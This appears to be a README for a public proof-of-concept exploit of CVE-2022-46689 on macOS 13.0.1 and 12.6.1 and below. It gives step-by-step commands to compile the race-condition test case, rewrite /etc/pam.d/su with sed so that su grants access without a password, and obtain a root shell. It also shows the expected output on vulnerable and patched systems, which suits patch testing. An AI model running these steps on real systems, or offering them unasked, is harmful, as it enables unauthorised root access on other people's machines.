Get root on macOS 13.0.1 with CVE-2022-46689 (macOS equivalent of the Dirty Cow bug), using the testcase extracted from Apple’s XNU source.
Usage
On a macOS 13.0.1 / 12.6.1 (or below) machine, clone the extracted test case:
git clone https://github.com/zhuowei/MacDirtyCowDemo
Then run:
clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su
You should get:
% ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
RO mapping was modified
% su
sh-3.2#
Tested on macOS 13 beta (22A5266r) with SIP off (it should still work with SIP on).
If your system is fully patched (macOS 13.1 / 12.6.2), it should instead read:
$ ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure
and running su should still ask for a password.
Than
